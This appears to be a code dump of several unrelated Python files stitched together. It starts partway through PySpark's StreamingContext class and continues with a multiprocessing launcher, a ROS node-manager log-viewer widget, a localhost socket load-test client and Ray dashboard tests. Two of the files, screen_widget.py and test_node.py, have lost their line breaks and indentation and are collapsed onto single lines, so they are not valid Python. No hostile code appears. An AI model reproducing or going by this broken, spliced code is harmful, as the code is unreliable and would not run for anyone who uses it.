        StreamingContext._activeContext = self

    def awaitTermination(self, timeout=None):
        """
        Wait for the execution to stop.

        @param timeout: time to wait in seconds
        """
        if timeout is None:
            self._jssc.awaitTermination()
        else:
            # JVM API takes milliseconds.
            self._jssc.awaitTerminationOrTimeout(int(timeout * 1000))

    def awaitTerminationOrTimeout(self, timeout):
        """
        Wait for the execution to stop. Return `true` if it's stopped; or
        throw the reported error during the execution; or `false` if the
        waiting time elapsed before returning from the method.

        @param timeout: time to wait in seconds
        """
        self._jssc.awaitTerminationOrTimeout(int(timeout * 1000))

    def stop(self, stopSparkContext=True, stopGraceFully=False):
        """
        Stop the execution of the streams, with option of ensuring all
        received data has been processed.

        @param stopSparkContext: Stop the associated SparkContext or not
        @param stopGracefully: Stop gracefully by waiting for the processing
                               of all received data to be completed
        """
        self._jssc.stop(stopSparkContext, stopGraceFully)
        StreamingContext._activeContext = None
        if stopSparkContext:
            self._sc.stop()

    def remember(self, duration):
        """
        Set each DStreams in this context to remember RDDs it generated
        in the last given duration. DStreams remember RDDs only for a
        limited duration of time and releases them for garbage collection.
        This method allows the developer to specify how to long to remember
        the RDDs (if the developer wishes to query old data outside the
        DStream computation).

        @param duration: Minimum duration (in seconds) that each DStream
                         should remember its RDDs
        """
        self._jssc.remember(self._jduration(duration))

    def checkpoint(self, directory):
        """
        Sets the context to periodically checkpoint the DStream operations for
        master fault-tolerance. The graph will be checkpointed every batch
        interval.

        @param directory: HDFS-compatible directory where the checkpoint data
                          will be reliably stored
        """
        self._jssc.checkpoint(directory)

    def socketTextStream(self, hostname, port, storageLevel=StorageLevel.MEMORY_AND_DISK_SER_2):
        """
        Create an input from TCP source hostname:port. Data is received using
        a TCP socket and receive byte is interpreted as UTF8 encoded ``\\n``
        delimited lines.

        @param hostname: Hostname to connect to for receiving data
        @param port: Port to connect to for receiving data
        @param storageLevel: Storage level to use for storing the received objects
        """
        jlevel = self._sc._getJavaStorageLevel(storageLevel)
        return DStream(self._jssc.socketTextStream(hostname, port, jlevel), self,
                       UTF8Deserializer())

    def textFileStream(self, directory):
        """
        Create an input stream that monitors a Hadoop-compatible file system
        for new files and reads them as text files. Files must be written to
        the monitored directory by "moving" them from another location within
        the same file system. File names starting with . are ignored.
        """
        return DStream(self._jssc.textFileStream(directory), self, UTF8Deserializer())

    def binaryRecordsStream(self, directory, recordLength):
        """
        Create an input stream that monitors a Hadoop-compatible file system
        for new files and reads them as flat binary files with records of
        fixed length. Files must be written to the monitored directory by
        "moving" them from another location within the same file system.
        File names starting with . are ignored.

        @param directory: Directory to load data from
        @param recordLength: Length of each record in bytes
        """
        return DStream(self._jssc.binaryRecordsStream(directory, recordLength), self,
                       NoOpSerializer())

    def _check_serializers(self, rdds):
        # make sure they have same serializer
        if len(set(rdd._jrdd_deserializer for rdd in rdds)) > 1:
            for i in range(len(rdds)):
                # reset them to sc.serializer
                rdds[i] = rdds[i]._reserialize()

    def queueStream(self, rdds, oneAtATime=True, default=None):
        """
        Create an input stream from an queue of RDDs or list. In each batch,
        it will process either one or all of the RDDs returned by the queue.

        NOTE: changes to the queue after the stream is created will not be recognized.

        @param rdds:       Queue of RDDs
        @param oneAtATime: pick one rdd each time or pick all of them once.
        @param default:    The default rdd if no more in rdds
        """
        if default and not isinstance(default, RDD):
            default = self._sc.parallelize(default)

        if not rdds and default:
            rdds = [rdds]

        if rdds and not isinstance(rdds[0], RDD):
            # Plain Python collections: turn each into an RDD first.
            rdds = [self._sc.parallelize(input) for input in rdds]
        self._check_serializers(rdds)

        queue = self._jvm.PythonDStream.toRDDQueue([r._jrdd for r in rdds])
        if default:
            default = default._reserialize(rdds[0]._jrdd_deserializer)
            jdstream = self._jssc.queueStream(queue, oneAtATime, default._jrdd)
        else:
            jdstream = self._jssc.queueStream(queue, oneAtATime)
        return DStream(jdstream, self, rdds[0]._jrdd_deserializer)

    def transform(self, dstreams, transformFunc):
        """
        Create a new DStream in which each RDD is generated by applying
        a function on RDDs of the DStreams. The order of the JavaRDDs in
        the transform function parameter will be the same as the order
        of corresponding DStreams in the list.
        """
        jdstreams = [d._jdstream for d in dstreams]
        # change the final serializer to sc.serializer
        func = TransformFunction(self._sc,
                                 lambda t, *rdds: transformFunc(rdds).map(lambda x: x),
                                 *[d._jrdd_deserializer for d in dstreams])
        jfunc = self._jvm.TransformFunction(func)
        jdstream = self._jssc.transform(jdstreams, jfunc)
        return DStream(jdstream, self, self._sc.serializer)

    def union(self, *dstreams):
        """
        Create a unified DStream from multiple DStreams of the same
        type and same slide duration.
        """
        if not dstreams:
            raise ValueError("should have at least one DStream to union")
        if len(dstreams) == 1:
            return dstreams[0]
        if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
            raise ValueError("All DStreams should have same serializer")
        if len(set(s._slideDuration for s in dstreams)) > 1:
            raise ValueError("All DStreams should have same slide duration")
        first = dstreams[0]
        jrest = [d._jdstream for d in dstreams[1:]]
        return DStream(self._jssc.union(first._jdstream, jrest), self, first._jrdd_deserializer)
main.py
from multiprocessing import Process, Queue

from node import Node

# Number of worker nodes to spawn.
NUM_NODES = 100

if __name__ == '__main__':
    # One Queue per node id, shared by every worker as a communal inbox.
    communal_inbox = {node_id: Queue() for node_id in range(NUM_NODES)}

    workers = [
        Process(target=Node, args=(communal_inbox, node_id))
        for node_id in range(NUM_NODES)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
screen_widget.py
# Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Fraunhofer nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
from datetime import datetime from python_qt_binding import loadUi from python_qt_binding.QtCore import Qt, Signal, QFile, QIODevice, QRegExp from python_qt_binding.QtGui import QColor, QIcon, QPalette, QTextCursor, QTextCharFormat, QTextDocument, QKeySequence try: from python_qt_binding.QtGui import QWidget, QTextEdit, QDialog, QShortcut except ImportError: from python_qt_binding.QtWidgets import QWidget, QTextEdit, QDialog, QShortcut import os import rospy import shlex import sys import subprocess import threading import time from .screen_highlighter import ScreenHighlighter from .terminal_formats import TerminalFormats from .logger_handler import LoggerHandler import fkie_node_manager as nm from fkie_node_manager_daemon import screen from fkie_node_manager_daemon.common import sizeof_fmt from fkie_node_manager_daemon.host import get_hostname class ScreenTextBrowser(QTextEdit): def __init__(self, parent=None): QTextEdit.__init__(self, parent) self._reader = None self.setAutoFillBackground(False) self.setReadOnly(True) self.setUndoRedoEnabled(False) self.setAutoFormatting(QTextEdit.AutoNone) self.setAcceptRichText(False) # self.textBrowser.document().setMaximumBlockCount(100) p = QPalette() p.setColor(QPalette.Base, Qt.black) p.setColor(QPalette.Text, Qt.white) self.setPalette(p) # self.setFontFamily('Monospace') # self.setFontPointSize(12) def set_reader(self, reader): self._reader = reader def keyPressEvent(self, event): if self._reader is not None: if event.key() == Qt.Key_PageUp and self.verticalScrollBar().value() == 0: self._reader.reverse_read(self.verticalScrollBar().pageStep() / 10) elif event.key() == Qt.Key_Home and event.modifiers() == Qt.ShiftModifier: self._reader.reverse_read(-1) QTextEdit.keyPressEvent(self, event) def wheelEvent(self, event): if self._reader is not None: lines = event.angleDelta().y() / 40 if lines > 0 and self.verticalScrollBar().value() == 0: self._reader.reverse_read(lines) QTextEdit.wheelEvent(self, event) class 
ScreenWidget(QWidget): ''' Shows the output of a screen. ''' clear_signal = Signal() cleared_signal = Signal() output = Signal(str) output_prefix = Signal(str) error_signal = Signal(str) auth_signal = Signal(str, str, str) # host, nodename, user def __init__(self, masteruri, screen_name, nodename, user=None, parent=None): ''' Creates the window, connects the signals and init the class. ''' QWidget.__init__(self, parent) # load the UI file screen_dock_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'ui', 'logscreen', 'ScreenWidget.ui') loadUi(screen_dock_file, self) self.setObjectName("ScreenWidget") self.setWindowIcon(nm.settings().icon('crystal_clear_show_io.png')) # self.setFeatures(QDockWidget.DockWidgetFloatable | QDockWidget.DockWidgetMovable | QDockWidget.DockWidgetClosable) self.pauseButton.setIcon(nm.settings().icon('sekkyumu_pause.png')) self._valid = True self._lock = threading.RLock() self.finished = False self.qfile = None self.thread = None self._info = '' self._masteruri = '' self._nodename = nodename self._first_fill = True self._seek_start = -1 self._seek_end = -1 self._pause_read_end = False self._ssh_output_file = None self._ssh_error_file = None self._ssh_input_file = None self._on_pause = False self._char_format_end = None self.logframe.setVisible(False) self.loglevelButton.toggled.connect(self.on_toggle_loggers) self.logger_handler = None # connect to the button signals self.output.connect(self._on_output) self.output_prefix.connect(self._on_output_prefix) self.error_signal.connect(self._on_error) self.auth_signal.connect(self.on_request_pw) self.clearCloseButton.clicked.connect(self.clear) # self.pauseButton.clicked.connect(self.stop) self.pauseButton.toggled.connect(self.pause) self.clear_signal.connect(self.clear) self.loggerFilterInput.textChanged.connect(self.on_logger_filter_changed) self.textBrowser.verticalScrollBar().valueChanged.connect(self.on_scrollbar_position_changed) 
self.textBrowser.verticalScrollBar().rangeChanged.connect(self.on_scrollbar_range_changed) self.textBrowser.set_reader(self) self.tf = TerminalFormats() self.hl = ScreenHighlighter(self.textBrowser.document()) self.searchFrame.setVisible(False) self.grepFrame.setVisible(False) self.grepLineEdit.textChanged.connect(self.on_grep_changed) self._shortcut_search = QShortcut(QKeySequence(self.tr("Ctrl+F", "Activate search")), self) self._shortcut_search.activated.connect(self.on_search) self._shortcut_grep = QShortcut(QKeySequence(self.tr("Ctrl+G", "Activate grep")), self) self._shortcut_grep.activated.connect(self.on_grep) self.searchLineEdit.editingFinished.connect(self.on_search_prev) self.searchNextButton.clicked.connect(self.on_search_next) self.searchPrevButton.clicked.connect(self.on_search_prev) # self.visibilityChanged.connect(self.stop) self._connect(masteruri, screen_name, nodename, user) def masteruri(self): return self._masteruri def name(self): return self._nodename def clear(self): ''' Removes all messages and emit the `cleared_signal`. 
''' self.textBrowser.clear() self.infoLabel.setText('') self.cleared_signal.emit() def finish(self): self.finished = True self.output.disconnect() self.output_prefix.disconnect() self.close() def closeEvent(self, event): self.stop() QWidget.closeEvent(self, event) def hide(self): self.stop() QWidget.hide(self) def close(self): self.stop() QWidget.close(self) def on_search(self): self.searchFrame.setVisible(not self.searchFrame.isVisible()) if self.searchFrame.isVisible(): self.searchLineEdit.setFocus() self.searchLineEdit.selectAll() else: cursor = self.textBrowser.textCursor() cursor.clearSelection() self.textBrowser.setTextCursor(cursor) self.textBrowser.setFocus() def on_search_next(self): self._perform_search(forward=True) def on_search_prev(self): self._perform_search(forward=False) def _perform_search(self, forward=False): search_str = self.searchLineEdit.text() if search_str: cursor = self.textBrowser.textCursor() if forward: search_result = self.textBrowser.document().find(search_str, cursor) else: search_result = self.textBrowser.document().find(search_str, cursor, QTextDocument.FindBackward) if search_result.position() > -1: self.textBrowser.setTextCursor(search_result) self.searchLabel.setText('') # self.searchLabel.setText('%d' % search_result.position()) else: self.searchLabel.setText('no results') else: self.searchLabel.setText('') def on_grep(self): self.grepFrame.setVisible(not self.grepFrame.isVisible()) if self.grepFrame.isVisible(): self.grepLineEdit.setFocus() self.on_grep_changed(self.grepLineEdit.text()) self.hl.set_grep_text('') self.grepLineEdit.selectAll() else: self.on_grep_changed('') self.textBrowser.setFocus() def on_grep_changed(self, text): self.hl.set_grep_text(text) def stop(self): ''' ''' if self.finished: return if self.qfile is not None and self.qfile.isOpen(): self.qfile.close() self.qfile = None self._seek_start = -1 self._seek_end = -1 self._pause_read_end = False # self.clear() try: self._ssh_output_file.close() 
self._ssh_error_file.close() # send Ctrl+C to remote process self._ssh_input_file.write('%s\n' % chr(3)) self._ssh_input_file.close() except Exception: pass self.finished = True def pause(self, state): self._on_pause = state def valid(self): return self._valid def _connect(self, masteruri, screen_name, nodename, user=None): self._masteruri = masteruri if self.qfile is not None and self.qfile.isOpen(): self.qfile.close() self.clear_signal.emit() host = get_hostname(masteruri) if nm.is_local(host): self._nodename = nodename if screen_name: screen_log = screen.get_logfile(node=nodename) else: screen_log = screen.get_ros_logfile(node=nodename) self.qfile = QFile(screen_log) self.setWindowTitle(nodename) if self.qfile.open(QIODevice.ReadOnly): self._first_fill = True self.qfile.seek(self.qfile.size()-1) # self.lread() self._info = "END" self.thread = threading.Thread(target=self._read_log, kwargs={"filename": screen_log}) self.thread.setDaemon(True) self.thread.start() else: self._valid = False else: self._connect_ssh(host, nodename, user) self.logger_handler = LoggerHandler(nodename, masteruri=masteruri, layout=self.scrollAreaWidgetContents.layout()) self.logger_handler.update() return False def _read_log(self, filename, lines=80): while self.qfile is not None and self.qfile.isOpen(): with self._lock: if self._first_fill: chars_count = self._seek_count_lines(lines) self._seek_start = self.qfile.pos() data = self.qfile.read(chars_count) if sys.version_info > (3, 0): data = data.decode('utf-8') self.output.emit(data) self._seek_end = self.qfile.pos() self._first_fill = False else: if self._seek_end != -1: self.qfile.seek(self._seek_end) if (not self._pause_read_end and self.qfile.bytesAvailable()): start = self.qfile.pos() data = self.qfile.readAll().data() if sys.version_info > (3, 0): data = data.decode('utf-8') self.output.emit(data) self._seek_end = self.qfile.pos() self._info = "NEW: %d" % (self._seek_end - start) time.sleep(0.25) def reverse_read(self, lines=20): 
with self._lock: if self.qfile is not None and self.qfile.isOpen(): if lines == -1: self.qfile.seek(0) chars_count = self._seek_start else: self.qfile.seek(self._seek_start) chars_count = self._seek_count_lines(lines) self._seek_start = self.qfile.pos() data = self.qfile.read(chars_count) if sys.version_info > (3, 0): data = data.decode('utf-8') self.output_prefix.emit(data) def _seek_count_lines(self, lines=20): if self.qfile.pos() < 2: self.qfile.seek(0) return self.qfile.pos() count = 0 chars_count = 2 line_size = 0 count_reached = False self.qfile.seek(self.qfile.pos() - 2) while (not count_reached) and (self.qfile.pos() > 0): ch = self.qfile.read(1) self.qfile.seek(self.qfile.pos() - 2) chars_count += 1 line_size += 1 if line_size > 120: count += 1 line_size = 0 if ch == b'\n': count += 1 line_size = 0 if count >= lines: count_reached = True return chars_count + 1 def _on_output_prefix(self, msg): ''' This text will be prepended ''' if self.finished or self._on_pause: return if msg: cursor = QTextCursor(self.textBrowser.document()) self.tf.insert_formated(cursor, msg.rstrip()) self.textBrowser.setTextCursor(cursor) self.textBrowser.moveCursor(QTextCursor.Start) self._update_info_label() def _on_output(self, msg): ''' This text will be appended. 
''' if self.finished or self._on_pause: return if msg: at_end = self.textBrowser.verticalScrollBar().value() > self.textBrowser.verticalScrollBar().maximum() - 20 cursor_select = self.textBrowser.textCursor() # store selection and do not scroll to the appended text if not cursor_select.hasSelection(): cursor_select = None cursor = self.textBrowser.textCursor() cursor.movePosition(QTextCursor.End) if self.hl.has_grep_text(): # grep new text lines = msg.splitlines(True) for line in lines: if self.hl.contains_grep_text(line): self._char_format_end = self.tf.insert_formated(cursor, line, char_format=None) else: self._char_format_end = self.tf.insert_formated(cursor, msg, char_format=self._char_format_end) if cursor_select is not None: # restore selection self.textBrowser.setTextCursor(cursor_select) elif at_end: self.textBrowser.moveCursor(QTextCursor.End) self._update_info_label() if not self.finished: self.show() def on_scrollbar_position_changed(self, value): self._update_info_label() def on_scrollbar_range_changed(self, min, max): self._update_info_label() def _on_error(self, msg): self.textBrowser.append(msg) self._update_info_label('SSH ERROR') def _update_info_label(self, info=''): info_text = info vbar_value = self.textBrowser.verticalScrollBar().value() if not info_text: if vbar_value == 0: if self._seek_start == 0: info_text = 'START' else: info_text += "%d %%" % (self._seek_start * 100 / self._seek_end) elif vbar_value == self.textBrowser.verticalScrollBar().maximum(): info_text = 'END' else: info_text = "%d / %d" % (vbar_value / 20, self.textBrowser.verticalScrollBar().maximum() / 20) seek_info = '' if self._seek_end > -1: seek_info = '\t%s / %s' % (sizeof_fmt(self._seek_end - self._seek_start), sizeof_fmt(self._seek_end)) elif self._ssh_output_file is not None: seek_info = '\ttail via SSH' self.infoLabel.setText(info_text + seek_info) def _connect_ssh(self, host, nodename, user=None, pw=None): try: if user is not None: self.infoLabel.setText('connecting to 
%s@%s' % (user, host)) else: self.infoLabel.setText('connecting to %s' % host) ok = False self._ssh_input_file, self._ssh_output_file, self._ssh_error_file, ok = nm.ssh().ssh_exec(host, [nm.settings().start_remote_script, '--tail_screen_log', nodename], user, pw, auto_pw_request=False, get_pty=True) if ok: thread = threading.Thread(target=self._read_ssh_output, args=((self._ssh_output_file,))) thread.setDaemon(True) thread.start() thread = threading.Thread(target=self._read_ssh_error, args=((self._ssh_error_file,))) thread.setDaemon(True) thread.start() elif self._ssh_output_file: self._ssh_output_file.close() self._ssh_error_file.close() except nm.AuthenticationRequest as e: self.auth_signal.emit(host, nodename, user) except Exception as e: self.error_signal.emit('%s\n' % e) def on_request_pw(self, host, nodename, user): res, user, pw = nm.ssh()._requestPW(user, host) if res: self._connect_ssh(host, nodename, user, pw) def _read_ssh_output(self, output_file): while not output_file.closed: text = output_file.readline() if text: self.output.emit(text.rstrip() + '\n') def _read_ssh_error(self, error_file): try: while not error_file.closed: text = error_file.readline() if text: self.error_signal.emit(text.rstrip() + '\n') except Exception: pass def on_toggle_loggers(self, state): self.logframe.setVisible(state) if state: self.logger_handler.update() def on_logger_filter_changed(self, text): ''' Filter the displayed loggers ''' if self.logger_handler is not None: self.logger_handler.filter(text)
client2.py
import socket
import time
from threading import Thread


def make_request():
    """Issue one plain-text GET to localhost:8000 and print the elapsed time.

    Prints the wall-clock timestamp and the request duration in seconds.
    """
    start_time = time.time()
    # Context manager guarantees the socket is closed even when
    # connect/send/recv raises (the original leaked the fd on error).
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect(('localhost', 8000))
        sock.send(b'GET /\n\n')
        resp = sock.recv(100)  # read (and discard) up to 100 bytes of reply
    end_time = time.time()
    print(time.strftime("%H:%M:%S"), end_time - start_time)


def do_request_forever():
    """Hammer the server with back-to-back requests, forever."""
    while True:
        make_request()


# Two concurrent client threads; they run until the process is killed.
# (Duplicate `from threading import Thread` that sat here was removed —
# the name is already imported at the top of the file.)
t1 = Thread(target=do_request_forever)
t2 = Thread(target=do_request_forever)
t1.start()
t2.start()
test_node.py
import os import sys import logging import requests import time import traceback import random import pytest import ray import threading from datetime import datetime, timedelta from ray.cluster_utils import Cluster from ray.new_dashboard.tests.conftest import * # noqa from ray._private.test_utils import ( format_web_url, wait_until_server_available, wait_for_condition, wait_until_succeeded_without_exception) logger = logging.getLogger(__name__) def test_nodes_update(enable_test_module, ray_start_with_dashboard): assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]) is True) webui_url = ray_start_with_dashboard["webui_url"] webui_url = format_web_url(webui_url) timeout_seconds = 10 start_time = time.time() while True: time.sleep(1) try: response = requests.get(webui_url + "/test/dump") response.raise_for_status() try: dump_info = response.json() except Exception as ex: logger.info("failed response: %s", response.text) raise ex assert dump_info["result"] is True dump_data = dump_info["data"] assert len(dump_data["nodes"]) == 1 assert len(dump_data["agents"]) == 1 assert len(dump_data["nodeIdToIp"]) == 1 assert len(dump_data["nodeIdToHostname"]) == 1 assert dump_data["nodes"].keys() == dump_data[ "nodeIdToHostname"].keys() response = requests.get(webui_url + "/test/notified_agents") response.raise_for_status() try: notified_agents = response.json() except Exception as ex: logger.info("failed response: %s", response.text) raise ex assert notified_agents["result"] is True notified_agents = notified_agents["data"] assert len(notified_agents) == 1 assert notified_agents == dump_data["agents"] break except (AssertionError, requests.exceptions.ConnectionError) as e: logger.info("Retry because of %s", e) finally: if time.time() > start_time + timeout_seconds: raise Exception("Timed out while testing.") def test_node_info(disable_aiohttp_cache, ray_start_with_dashboard): @ray.remote class Actor: def getpid(self): return os.getpid() actors = 
[Actor.remote(), Actor.remote()] actor_pids = [actor.getpid.remote() for actor in actors] actor_pids = set(ray.get(actor_pids)) assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]) is True) webui_url = ray_start_with_dashboard["webui_url"] webui_url = format_web_url(webui_url) node_id = ray_start_with_dashboard["node_id"] timeout_seconds = 10 start_time = time.time() last_ex = None while True: time.sleep(1) try: response = requests.get(webui_url + "/nodes?view=hostnamelist") response.raise_for_status() hostname_list = response.json() assert hostname_list["result"] is True, hostname_list["msg"] hostname_list = hostname_list["data"]["hostNameList"] assert len(hostname_list) == 1 hostname = hostname_list[0] response = requests.get(webui_url + f"/nodes/{node_id}") response.raise_for_status() detail = response.json() assert detail["result"] is True, detail["msg"] detail = detail["data"]["detail"] assert detail["hostname"] == hostname assert detail["raylet"]["state"] == "ALIVE" assert "raylet" in detail["cmdline"][0] assert len(detail["workers"]) >= 2 assert len(detail["actors"]) == 2, detail["actors"] assert len(detail["raylet"]["viewData"]) > 0 actor_worker_pids = set() for worker in detail["workers"]: if "ray::Actor" in worker["cmdline"][0]: actor_worker_pids.add(worker["pid"]) assert actor_worker_pids == actor_pids response = requests.get(webui_url + "/nodes?view=summary") response.raise_for_status() summary = response.json() assert summary["result"] is True, summary["msg"] assert len(summary["data"]["summary"]) == 1 summary = summary["data"]["summary"][0] assert summary["hostname"] == hostname assert summary["raylet"]["state"] == "ALIVE" assert "raylet" in summary["cmdline"][0] assert "workers" not in summary assert "actors" not in summary assert "viewData" not in summary["raylet"] assert "objectStoreAvailableMemory" in summary["raylet"] assert "objectStoreUsedMemory" in summary["raylet"] break except Exception as ex: last_ex = ex finally: if 
time.time() > start_time + timeout_seconds: ex_stack = traceback.format_exception( type(last_ex), last_ex, last_ex.__traceback__) if last_ex else [] ex_stack = "".join(ex_stack) raise Exception(f"Timed out while testing, {ex_stack}") def test_memory_table(disable_aiohttp_cache, ray_start_with_dashboard): assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])) @ray.remote class ActorWithObjs: def __init__(self): self.obj_ref = ray.put([1, 2, 3]) def get_obj(self): return ray.get(self.obj_ref) my_obj = ray.put([1, 2, 3] * 100) # noqa actors = [ActorWithObjs.remote() for _ in range(2)] # noqa results = ray.get([actor.get_obj.remote() for actor in actors]) # noqa webui_url = format_web_url(ray_start_with_dashboard["webui_url"]) resp = requests.get( webui_url + "/memory/set_fetch", params={"shouldFetch": "true"}) resp.raise_for_status() def check_mem_table(): resp = requests.get(f"{webui_url}/memory/memory_table") resp_data = resp.json() assert resp_data["result"] latest_memory_table = resp_data["data"]["memoryTable"] summary = latest_memory_table["summary"] # 1 ref per handle and per object the actor has a ref to assert summary["totalActorHandles"] == len(actors) * 2 # 1 ref for my_obj assert summary["totalLocalRefCount"] == 1 wait_until_succeeded_without_exception( check_mem_table, (AssertionError, ), timeout_ms=1000) def test_get_all_node_details(disable_aiohttp_cache, ray_start_with_dashboard): assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])) webui_url = format_web_url(ray_start_with_dashboard["webui_url"]) @ray.remote class ActorWithObjs: def __init__(self): print("I also log a line") self.obj_ref = ray.put([1, 2, 3]) def get_obj(self): return ray.get(self.obj_ref) actors = [ActorWithObjs.remote() for _ in range(2)] # noqa timeout_seconds = 20 start_time = time.time() last_ex = None def check_node_details(): resp = requests.get(f"{webui_url}/nodes?view=details") resp_json = resp.json() resp_data = resp_json["data"] 
clients = resp_data["clients"] node = clients[0] assert len(clients) == 1 assert len(node.get("actors")) == 2 # Workers information should be in the detailed payload assert "workers" in node assert "logCount" in node # Two lines printed by ActorWithObjs # One line printed by autoscaler: monitor.py:118 -- Monitor: Started assert node["logCount"] > 2 print(node["workers"]) assert len(node["workers"]) == 2 assert node["workers"][0]["logCount"] == 1 while True: time.sleep(1) try: check_node_details() break except (AssertionError, KeyError, IndexError) as ex: last_ex = ex finally: if time.time() > start_time + timeout_seconds: ex_stack = traceback.format_exception( type(last_ex), last_ex, last_ex.__traceback__) if last_ex else [] ex_stack = "".join(ex_stack) raise Exception(f"Timed out while testing, {ex_stack}") @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_multi_nodes_info(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster: Cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = cluster.webui_url webui_url = format_web_url(webui_url) cluster.add_node() cluster.add_node() def _check_nodes(): try: response = requests.get(webui_url + "/nodes?view=summary") response.raise_for_status() summary = response.json() assert summary["result"] is True, summary["msg"] summary = summary["data"]["summary"] assert len(summary) == 3 for node_info in summary: node_id = node_info["raylet"]["nodeId"] response = requests.get(webui_url + f"/nodes/{node_id}") response.raise_for_status() detail = response.json() assert detail["result"] is True, detail["msg"] detail = detail["data"]["detail"] assert detail["raylet"]["state"] == "ALIVE" response = requests.get(webui_url + "/test/dump?key=agents") response.raise_for_status() agents = response.json() assert len(agents["data"]["agents"]) == 3 return True except Exception as ex: logger.info(ex) return False 
wait_for_condition(_check_nodes, timeout=15) @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_multi_node_churn(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster: Cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = format_web_url(cluster.webui_url) def cluster_chaos_monkey(): worker_nodes = [] while True: time.sleep(5) if len(worker_nodes) < 2: worker_nodes.append(cluster.add_node()) continue should_add_node = random.randint(0, 1) if should_add_node: worker_nodes.append(cluster.add_node()) else: node_index = random.randrange(0, len(worker_nodes)) node_to_remove = worker_nodes.pop(node_index) cluster.remove_node(node_to_remove) def get_index(): resp = requests.get(webui_url) resp.raise_for_status() def get_nodes(): resp = requests.get(webui_url + "/nodes?view=summary") resp.raise_for_status() summary = resp.json() assert summary["result"] is True, summary["msg"] assert summary["data"]["summary"] t = threading.Thread(target=cluster_chaos_monkey, daemon=True) t.start() t_st = datetime.now() duration = timedelta(seconds=60) while datetime.now() < t_st + duration: get_index() time.sleep(2) @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_logs(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = cluster.webui_url webui_url = format_web_url(webui_url) nodes = ray.nodes() assert len(nodes) == 1 node_ip = nodes[0]["NodeManagerAddress"] @ray.remote class LoggingActor: def go(self, n): i = 0 while i < n: print(f"On number {i}") i += 1 def get_pid(self): return os.getpid() la = LoggingActor.remote() la2 = LoggingActor.remote() la_pid = str(ray.get(la.get_pid.remote())) la2_pid = str(ray.get(la2.get_pid.remote())) ray.get(la.go.remote(4)) 
ray.get(la2.go.remote(1)) def check_logs(): node_logs_response = requests.get( f"{webui_url}/node_logs", params={"ip": node_ip}) node_logs_response.raise_for_status() node_logs = node_logs_response.json() assert node_logs["result"] assert type(node_logs["data"]["logs"]) is dict assert all( pid in node_logs["data"]["logs"] for pid in (la_pid, la2_pid)) assert len(node_logs["data"]["logs"][la2_pid]) == 1 actor_one_logs_response = requests.get( f"{webui_url}/node_logs", params={ "ip": node_ip, "pid": str(la_pid) }) actor_one_logs_response.raise_for_status() actor_one_logs = actor_one_logs_response.json() assert actor_one_logs["result"] assert type(actor_one_logs["data"]["logs"]) is dict assert len(actor_one_logs["data"]["logs"][la_pid]) == 4 wait_until_succeeded_without_exception( check_logs, (AssertionError), timeout_ms=1000) @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_errors(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = cluster.webui_url webui_url = format_web_url(webui_url) nodes = ray.nodes() assert len(nodes) == 1 node_ip = nodes[0]["NodeManagerAddress"] @ray.remote class ErrorActor(): def go(self): raise ValueError("This is an error") def get_pid(self): return os.getpid() ea = ErrorActor.remote() ea_pid = ea.get_pid.remote() ea.go.remote() def check_errs(): node_errs_response = requests.get( f"{webui_url}/node_logs", params={"ip": node_ip}) node_errs_response.raise_for_status() node_errs = node_errs_response.json() assert node_errs["result"] assert type(node_errs["data"]["errors"]) is dict assert ea_pid in node_errs["data"]["errors"] assert len(node_errs["data"]["errors"][ea_pid]) == 1 actor_err_response = requests.get( f"{webui_url}/node_logs", params={ "ip": node_ip, "pid": str(ea_pid) }) actor_err_response.raise_for_status() actor_errs = actor_err_response.json() 
assert actor_errs["result"] assert type(actor_errs["data"]["errors"]) is dict assert len(actor_errs["data"]["errors"][ea_pid]) == 4 wait_until_succeeded_without_exception( check_errs, (AssertionError), timeout_ms=1000) if __name__ == "__main__": sys.exit(pytest.main(["-v", __file__]))
